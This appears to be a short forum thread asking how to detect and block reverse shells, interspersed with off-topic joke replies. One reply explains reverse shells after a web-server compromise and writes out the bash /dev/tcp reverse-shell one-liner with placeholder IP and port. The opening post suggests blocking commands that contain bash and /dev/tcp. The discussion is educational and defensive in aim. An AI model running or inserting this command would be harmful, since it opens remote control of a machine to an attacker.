Reverse shells

How can you detect the presence of a reverse shell, aside from using network monitoring like Wireshark or something? Can you just use the w or who commands to see all shells? And how can you disallow reverse bash shells? Maybe make it so commands with bash and /dev/tcp/ aren't allowed?

What's hsab?

>>2
I don't know, you tell me.

>>2
read Holy Quran

bump for a real reply plz

What is a reverse shell?

>>6
let's say you want to hack a web server (I am learning about security but I only do 100% legal stuff, just for the record), and you find that it has a remote file inclusion vulnerability, then you can get a web shell on it, and you might be able to get code execution, or there are other ways too, like maybe you found a server running an old version of SMB that's vulnerable to EternalBlue or whatever

but regardless, once you have code execution, even unprivileged execution, you can get a reverse shell instead of just a web shell or exploit, so then you'd want your exploit or web shell to run this command:
bash -i >& /dev/tcp/[your IP]/[port] 0>&1
then you'd have a bash shell, just like a local one, except it's remote, and it's a reverse shell because the device is connecting to you rather than you connecting to the device

a shell on a server would be you trying to establish a connection from the outside, but most firewalls would stop or at least detect and log it

a reverse shell on a server is harder to detect because for the most part people allow requests from within their network to connect to stuff outside, but the opposite is not true

SO... now that you know how someone can establish a reverse shell, how do you protect against it?

She reverses reversed shells by the reversed shore.

>>8
nice

Fahr' ich in Ulm, so fahr' ich in Ulm und um Ulm herum.

https://www.youtube.com/watch?v=rL3yq5a_vNM